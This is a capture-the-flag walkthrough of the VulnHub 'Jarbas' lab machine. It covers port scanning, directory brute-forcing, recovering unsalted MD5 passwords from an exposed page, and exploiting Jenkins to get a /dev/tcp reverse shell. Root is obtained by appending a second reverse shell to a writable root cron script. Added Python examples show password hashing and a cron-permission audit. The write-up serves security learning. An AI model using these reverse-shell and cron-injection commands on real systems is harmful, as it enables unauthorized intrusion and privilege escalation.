Jarbas
URL: https://www.vulnhub.com/entry/jarbas-1,232/
1. Host discovery
sudo nmap -sn 192.168.239.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:33 CST
Nmap scan report for 192.168.239.1
Host is up (0.00071s latency).
MAC Address: 00:50:56:C0:00:03 (VMware)
Nmap scan report for 192.168.239.132
Host is up (0.00063s latency).
MAC Address: 00:0C:29:34:B4:7F (VMware)
Nmap scan report for 192.168.239.254
Host is up (0.00010s latency).
MAC Address: 00:50:56:ED:A6:56 (VMware)
Nmap scan report for 192.168.239.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.01 seconds
2. Port scanning
- Scan all ports
nmap --min-rate 10000 -p- 192.168.239.132
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:35 CST
Nmap scan report for 192.168.239.132
Host is up (0.0011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:34:B4:7F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 17.11 seconds
Scan again:
┌──(de1te㉿de1te)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.239.132
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:36 CST
Nmap scan report for 192.168.239.132
Host is up (0.000067s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:34:B4:7F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds
Ports 22, 80, 3306 and 8080 are open.
- Check the service versions on the open ports and the OS version
sudo nmap -sT -sV -O -p 22,80,3306,8080 192.168.239.132
Nmap scan report for 192.168.239.132
Host is up (0.00040s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:34:B4:7F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.09 seconds
- Look for easy vulnerabilities
sudo nmap --script=vuln -p 22,80,3306,8080 192.168.239.132
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:42 CST
Nmap scan report for 192.168.239.132
Host is up (0.00027s latency).
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum:
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:34:B4:7F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 38.03 seconds
Port 8080 has a robots.txt; let's see what is in it:
# we don't want robots to click "build" links
User-agent: *
Disallow: /
Nothing useful.
Summary: ports 80 and 8080 are open, so start with the web side.
3. Web
- Review the website
On port 80:
On port 8080:
A login page. There are generally three ways to obtain a login account and password:
- Default credentials
- Credentials leaked somewhere on the site
- Brute force
- Directory brute-force
sudo gobuster dir -u 192.168.239.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.239.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/03/27 17:00:06 Starting gobuster in directory enumeration mode
===============================================================
Progress: 20023 / 62285 (32.15%)[ERROR] 2023/03/27 17:00:09 [!] parse "http://192.168.239.132/error\x1f_log": net/url: invalid control character in URL
Progress: 61964 / 62285 (99.48%)
===============================================================
2023/03/27 17:00:14 Finished
===============================================================
Nothing much; try again with a few file extensions:
sudo gobuster dir -u 192.168.239.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.239.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              html,php
[+] Timeout:                 10s
===============================================================
2023/03/27 17:01:30 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 32808]
/access.html          (Status: 200) [Size: 359]
/.html                (Status: 403) [Size: 207]
Progress: 66397 / 186855 (35.53%)[ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/besalu\t.php": net/url: invalid control character in URL
Progress: 70235 / 186855 (37.59%)[ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log.php": net/url: invalid control character in URL
/.html                (Status: 403) [Size: 207]
/index.html           (Status: 200) [Size: 32808]
/.html                (Status: 403) [Size: 207]
Progress: 183153 / 186855 (98.02%)
===============================================================
2023/03/27 17:01:54 Finished
===============================================================
There is an access.html page; take a look:
Creds encrypted in a safe way!
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
Hmm, the part after the colon looks like MD5.
sudo hash-identifier '5978a63b4654c73c60fa24f836386d87'
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Sure enough, MD5.
Look the hashes up:
5978a63b4654c73c60fa24f836386d87:italia99
9b38e2b1e8b12f426b0d208a7ab6cb98:vipsu
f463f63616cb3f1e81ce46b39f882fd5:marianna
Now we have the following information:
tiago : italia99
trindade : vipsu
eder : marianna
None of these pairs work (note that the lookup returned the hashes in a different order from access.html), so try the permutations:
eder / vipsu works.
Or brute-force it with a cluster bomb attack:
- Burp Suite
Result:
eder ----> vipsu
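The "Creds encrypted in a safe way!" file stores unsalted MD5, which is why a hash lookup recovers the passwords instantly. As an added example (not from the original post), this Python script parses the access.html format, pairs each user with the recovered plaintext by recomputing MD5 (the pairing the permutation step above arrives at), and shows the hardened form beside it: a salted, iterated PBKDF2-HMAC-SHA256 hash. The `hash_password`/`verify_password` helpers are a hypothetical replacement, not code from the box.

```python
import hashlib
import hmac
import os
import re

# Constructed copy of the three lines served by access.html on the box.
ACCESS_HTML_CREDS = """Creds encrypted in a safe way!
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
"""

CRED_LINE = re.compile(r"^(\w+):([0-9a-fA-F]{32})$")

def parse_creds(text):
    """Return {user: hex_digest} for every 'user:32-hex-chars' line; other lines are ignored."""
    creds = {}
    for line in text.splitlines():
        m = CRED_LINE.match(line.strip())
        if m:
            creds[m.group(1)] = m.group(2).lower()
    return creds

def md5_matches(digest, candidate):
    """True if candidate is the unsalted-MD5 preimage of digest (the type hash-identifier flagged)."""
    return hmac.compare_digest(hashlib.md5(candidate.encode()).hexdigest(), digest)

def resolve_users(creds, plaintexts):
    """Pair each user with the recovered plaintext whose MD5 equals that user's digest, or None."""
    return {user: next((p for p in plaintexts if md5_matches(digest, p)), None)
            for user, digest in creds.items()}

# Hardened form (hypothetical replacement, not the box's code): salted PBKDF2-HMAC-SHA256.
def hash_password(password, iterations=600_000):
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(stored, password):
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    print(resolve_users(parse_creds(ACCESS_HTML_CREDS), ["italia99", "vipsu", "marianna"]))
    stored = hash_password("vipsu")
    print(verify_password(stored, "vipsu"), verify_password(stored, "wrong"))
```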
- Jenkins exploitation
It should be this one: CVE-2019-10352
Exploitation:
Reverse shell:
/bin/bash -i >& /dev/tcp/192.168.239.129/4444 0>&1
Start a listener:
sudo nc -lvnp 4444
We get the reverse shell:
bash-4.2$ ls
4. Privilege escalation
bash-4.2$ whoami # current user
whoami
jenkins
bash-4.2$ uname -a # system version
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ sudo -l # the current user's sudo rights
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
sudo: no tty present and no askpass program specified
bash-4.2$ cat /etc/passwd # list all users
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$ cat /etc/crontab # scheduled jobs
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
# look at the scheduled script
cat /etc/script/CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
# check whether we can write to it
echo '/bin/bash -i >& /dev/tcp/192.168.239.129/4443 0>&1' >>/etc/script/CleaningScript.sh
Success:
Listener (left pane):
┌──(de1te㉿de1te)-[~]
└─$ sudo nc -lvnp 4443
[sudo] de1te 的密码:
listening on [any] 4443 ...
connect to [192.168.239.129] from (UNKNOWN) [192.168.239.132] 33726
bash: no job control in this shell
[root@jarbas ~]#
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs
[root@jarbas ~]#
Attacker address for reference (right pane):
┌──(de1te㉿de1te)-[~]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:4c:a6:2d brd ff:ff:ff:ff:ff:ff
    inet 192.168.239.129/24 brd 192.168.239.255 scope global dynamic noprefixroute eth0
       valid_lft 903sec preferred_lft 903sec
    inet6 fe80::20c:29ff:fe4c:a62d/64 scope link noprefixroute
       valid_lft forever preferred_lft forever

┌──(de1te㉿de1te)-[~]
└─$
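The escalation works because a script that root runs every five minutes from /etc/crontab was writable by the low-privileged jenkins user. As an added example (not from the original post), this Python audit parses /etc/crontab-format text and flags root jobs whose script, or the directory holding it, can be modified by other users. It runs against a constructed crontab and a throwaway script in a temporary directory, so it never touches the real system crontab; `build_demo` and its path are assumptions of this demo.

```python
import os
import stat
import tempfile

# Constructed /etc/crontab text modelled on the box's; {script} is replaced with a throwaway
# file this demo creates, so nothing here reads or changes the real system crontab.
CRONTAB_TEMPLATE = """SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
*/5 * * * * root {script} >/dev/null 2>&1
"""

def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style lines (user is field 6, command field 7)."""
    jobs = []
    for raw in text.splitlines():
        fields = raw.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0] or len(fields) < 7:
            continue  # blank, comment, environment assignment or malformed line
        jobs.append((fields[5], fields[6]))
    return jobs

def weak_permissions(path):
    """Reasons a non-root user could change what root executes from this path (empty = ok)."""
    reasons = []
    mode = os.stat(path).st_mode
    if mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    parent = os.stat(os.path.dirname(path) or ".").st_mode
    if parent & stat.S_IWOTH and not parent & stat.S_ISVTX:
        reasons.append("parent directory world-writable, script can be replaced")
    return reasons

def audit_root_cron(crontab_text):
    """Map every root job whose command is an existing absolute path to its list of weaknesses."""
    return {cmd: weak_permissions(cmd) for user, cmd in parse_system_crontab(crontab_text)
            if user == "root" and os.path.isabs(cmd) and os.path.isfile(cmd)}

def build_demo(mode=0o777):
    """Write a throwaway CleaningScript.sh with the given mode; return (crontab_text, path)."""
    path = os.path.join(tempfile.mkdtemp(), "CleaningScript.sh")
    with open(path, "w") as f:
        f.write("#!/bin/bash\nrm -rf /var/log/httpd/access_log.txt\n")
    os.chmod(path, mode)
    return CRONTAB_TEMPLATE.format(script=path), path

if __name__ == "__main__":
    print(audit_root_cron(build_demo()[0]))  # the mode-0777 script is flagged group- and world-writable
```

Run it on a real host by feeding the contents of /etc/crontab (and the files under /etc/cron.d) to `audit_root_cron`; any non-empty list is a script the jenkins-style escalation above would work against.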
From: https://www.cnblogs.com/nsqaq/p/17292660.html